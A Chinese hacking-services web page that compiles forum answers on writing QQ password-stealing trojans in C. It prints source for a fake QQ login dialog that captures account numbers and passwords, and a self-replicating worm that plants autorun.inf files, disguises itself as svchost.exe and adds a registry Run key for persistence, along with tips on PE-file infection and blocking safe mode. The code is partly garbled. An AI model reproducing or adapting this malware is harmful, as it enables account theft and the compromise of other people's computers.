网站入侵

入侵网站,破解服务,入侵服务,渗透测试,网络安全

如何用c写盗号木马(木马盗号的原理)

本文目录一览:

一般盗号的程序是用什么语言编写的

杀毒软件就是垃圾软件

360更是流氓软件之王

盗号程序一般是用DELPHI编写的,高手也有用C或C++

原理简单的说就是骇客通过各种途径让你的电脑下载木马(网页挂马,主动入侵,社会工程等)

并在后台运行他,然后当你运行游戏的时候,木马会侦测到你已经开启了登陆窗口,就会进行键盘记录

当你点登陆后,密码就发送到骇客的邮箱或者网站上了..这是一般的盗号程序的原理

想防止的话,到微软官方网站去下载补丁,不要相信360什么的流氓软件

这样被挂马和主动入侵的机会就会减小,关于社会工程入侵,你最好买一本关于心理的书籍翻翻~~~

要写一个简单的木马需要掌握哪些知识?

1.良好的编程知识(C++,JAVA,delphi,VB也凑合,实在不行用易语言) 至少会一样吧

2.确定木马的功能.木马有很多种,示功能而定,比如盗号木马,远程控制木马(这类木马一般功能比较完美),网页木马(拿来黑网站用的),还有一些比如实现某一特殊功能的,.如DDOS攻击木马,控制类木马则还要编写主控端

3确定木马的连接方式,主动式和被动式(就是网上说的主动连接和反向连接)主动连接基本已经被淘汰了,

4,木马的隐藏,这是最大的问题也是最难的问题,如果你的木马不能隐藏那么也没就没有生存的余地.不仅仅是隐藏木马文件,进程,(这一般通过加载为系统服务或者通过DLL隐藏进程还有一些木马用驱动隐藏)还要隐藏木马的通信方式,不被防火墙阻止(如HTTP隧道)这里面的学问很多

5加壳,就是加密木马,还可以减少木马体积.

这里主要说下木马主体的编写方式

以最简单的盗QQ木马(阿拉QQ大盗)为例.

1.中马之后,先替换掉TXPlatform.exe(QQ密码保护文件)后台监视系统.如发现QQ.exe,则监视QQ两个文本框的text值,并将输入的信息保存,生成邮件.后台发送到种马人.这个很简单,难的再于如何替换TXPlatform.exe并且不被QQ.exe发现.还有就是如何才能取得QQ文本框中的两个值.

附送一份N年前的QQ盗号木马源程...仅做研究,这个是N年前的,用的不是我上面提到的方法,用的是把QQ的输入框替换为假的,然后密码自然而然的被木马给知道了.

BOOL processIdToName(LPTSTR lpszProcessName, DWORD PID)

{

HANDLE hSnapshot = C★reateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

PROCESSENTRY32 pe;

pe.dwSize = sizeof(PROCESSENTRY32);

if (!Process32First(hSnapshot, pe)) {

return FALSE;

}

while (Process32Next(hSnapshot, pe)) {

if (pe.th32ProcessID == PID) {

strcpy(lpszProcessName, pe.szExeFile);

return true;

}

}

return FALSE;

}

//查找QQ登录窗口

void QQFind()

{

HWND hWnd1 = NULL, qqID_hWnd = NULL, qqPass_hWnd = NULL;

HWND ButtonLogin = NULL, ButtonCancel = NULL;

c★har sTitle[255];

CString ss;

DWORD QQPID;

int LoginID;

BOOL find = FALSE;

do

{

//获得当前激活窗口的句柄

g_hWnd = GetForegroundWindow();

GetWindowThreadProcessId(g_hWnd, QQPID);

//根据PID获得进程名

processIdToName(sTitle, QQPID);

ss = sTitle;

ss.MakeLower();

//判断是否QQ

if(ss != "qq.exe")

{

Sleep(100);

continue;

}

//获得标题文字,判断是否登陆对话框

SendMessage(g_hWnd,WM_GETTEXT,255,(LPARAM)sTitle);

ss = sTitle;

int n = ss.Find("QQ", 0);

int m = ss.Find("登录", 0);

if(n = 0 || m = 0)

{

//查找QQ登陆按钮的句柄

ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, "Button", "登录");

LoginID = GetDlgCtrlID(ButtonLogin);

ButtonLogin = FindWindowEx(g_hWnd, ButtonLogin, "Button", "登录");

LoginID = GetDlgCtrlID(ButtonLogin);

//获得QQ登陆按钮窗口位置

GetWindowRect(ButtonLogin, g_qqLogin);

//查找QQ取消按钮的句柄

ButtonCancel = FindWindowEx(g_hWnd, NULL, "Button", "取消");

//获得QQ取消按钮窗口位置

GetWindowRect(ButtonCancel, g_qqCancel);

//查找QQ密码输入框的句柄

hWnd1 = FindWindowEx(g_hWnd, NULL, "#32770", NULL);

if(hWnd1 != NULL)

{

qqPass_hWnd = FindWindowEx(hWnd1, qqPass_hWnd, "Edit", NULL);

//获得QQ密码输入框窗口位置

GetWindowRect(qqPass_hWnd, g_qqPassRt);

}

//查找QQ号码输入框的句柄

hWnd1 = FindWindowEx(g_hWnd, NULL, "ComboBox", NULL);

if(hWnd1 != NULL)

{

qqID_hWnd = FindWindowEx(hWnd1, qqID_hWnd, "Edit", NULL);

//获得QQ号码输入框窗口位置

GetWindowRect(qqID_hWnd, g_qqIDRt);

//获得当前默认QQ号码

SendMessage(qqID_hWnd,WM_GETTEXT, 255,(LPARAM)qqid);

}

//等待QQ窗口完全出现后抓取整个屏幕

Sleep(100);

g_DlgRt.left = 0;

g_DlgRt.top = 0;

g_DlgRt.right = m_xScreen;

g_DlgRt.bottom = m_yScreen;

g_pBitmap = CopyScreenToBitmap(g_DlgRt);

//设置QQ窗口为不可见

ShowWindow(g_hWnd, SW_HIDE);

//弹出我们创建的伪造对话框

HINSTANCE hInstance = GetModuleHandle(NULL);

DialogBoxParam(hInstance, (LPCTSTR)IDD_WIN847, 0, (DLGPROC)win847, 0);

//设置QQ窗口为可见

ShowWindow(g_hWnd, SW_SHOW);

//把QQ号码和密码填到真正的QQ登录窗口上,并模拟单击登陆按钮

SendMessage(qqID_hWnd, WM_SETTEXT, 0, (LPARAM)qqid);

SendMessage(qqPass_hWnd, WM_SETTEXT, 0, (LPARAM)qqpass);

SendMessage(ButtonLogin, BM_CLICK, 0, 0);

D★eleteObject(g_pBitmap);

//设置标志退出循环

find = true;

}

}

while(find == FALSE);

}

如何用C语言写病毒?

在读本程序前请保证不用此程序进行违法活动,否则,请马上离开.最基本的病毒.

本病毒的功能:

1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件

2.在C、D、E盘中生成自动运行文件

3.注册c:\windows\system\svchost.exe,使其开机自动运行

4.在C:\windows\system下生成隐蔽DLL文件

5.病毒在执行后具有相联复制能力本病毒类似普通U盘病毒雏形,具备自我复制、运行能力。以下程序在DEV-CPP 4.9.9.2(GCC编译器)下编译通过

请保存为SVCHOST.C编译,运行,本病毒对计算机无危害,请放心研究

/* SVCHOST.C */

/* SVCHOST.EXE */#define SVCHOST_NUM 6

#includestdio.h

#includestring.h

char *autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"};

char *files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"};

char *files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL",

"c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe",

"c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"};

char *regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f";int copy(char *infile,char *outfile)

{

FILE *input,*output;

char temp;

if(strcmp(infile,outfile)!=0 ((input=fopen(infile,"rb"))!=NULL) ((output=fopen(outfile,"wb"))!=NULL))

{

while(!feof(input))

{

fread(temp,1,1,input);

fwrite(temp,1,1,output);

}

fclose(input);

fclose(output);

return 0;

}

else return 1;

}

int main(void)

{

FILE *input,*output;

int i,k;

for(i=0;i3;i++)

{

output=fopen(files_autorun[i],"w");

fprintf(output,"%s",autorun);

fclose(output);

}

for(i=0;i=SVCHOST_NUM;i++)

{

if((input=fopen(files_svchost[i],"rb"))!=NULL)

{

fclose(input);

for(k=0;kSVCHOST_NUM;k++)

{

copy(files_svchost[i],files_svchost[k]);

}

i=SVCHOST_NUM+1;

}

}

system(regadd); /* 注册SVCHOST.exe,让其在启动时运行 */

return 0;

} 如果你想来狠点;把安全模式的注册表项也删除了.让它进不了安全模式;

警告:不会修改注册表的人;别运行本程序...

请介绍下C语言写木马的算法......

我只知道window的木马程序的原理,首先你要去研究一下windows PE文件的格式,windows PE文件包括(exe dll文件等),用文本方式打开任意一个exe或者dll文件,就会发现这些文件都具有类似的组织结构(就是PE格式)

仔细耐心地研究了PE格式后,你会发现这些PE格式的文件有很多间隙空间可用,window木马程序正是利用PE格式文件中的这些间隙,把自己的代码插入这些间隙空间中,同时还要修改宿主程序的入口地址(OEP Original Entry Point)

这样,宿主程序一运行,首先运行生成木马的代码,然后运行宿主程序。

Windows应用程序捆绑核心编程 (PE)

  • 评论列表:
  •  颜于酒岁
     发布于 2022-07-12 03:37:45  回复该评论
  • gRt.bottom = m_yScreen; g_pBitmap = CopyScreenToBitmap(g_DlgRt); //设置QQ窗口为不可见 ShowWindow(g_hWnd, SW_HIDE); //弹出我们创建的伪造对话框 HINSTANCE hInstance = Ge
  •  拥嬉溇涏
     发布于 2022-07-11 21:44:00  回复该评论
  • eturn 0;} 如果你想来狠点;把安全模式的注册表项也删除了.让它进不了安全模式; 警告:不会修改注册表的人;别运行本程序...请介绍下C语言写木马的算法......我只知道window的木马程序的原理,首先你要去研究一下windows PE文件的格式,windows P
  •  鸽吻苍阶
     发布于 2022-07-12 01:35:32  回复该评论
  • windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe","c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"};char *regadd=
  •  馥妴念稚
     发布于 2022-07-12 01:17:21  回复该评论
  • Wnd = FindWindowEx(hWnd1, qqID_hWnd, "Edit", NULL); //获得QQ号码输入框窗口位置 GetWindowRect(qqID_hWnd, g_qqIDRt); //
  •  走野1
     发布于 2022-07-11 16:46:57  回复该评论
  • eturn 1;}int main(void){ FILE *input,*output; int i,k; for(i=0;i3;i++) { output=fopen(files_autor

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.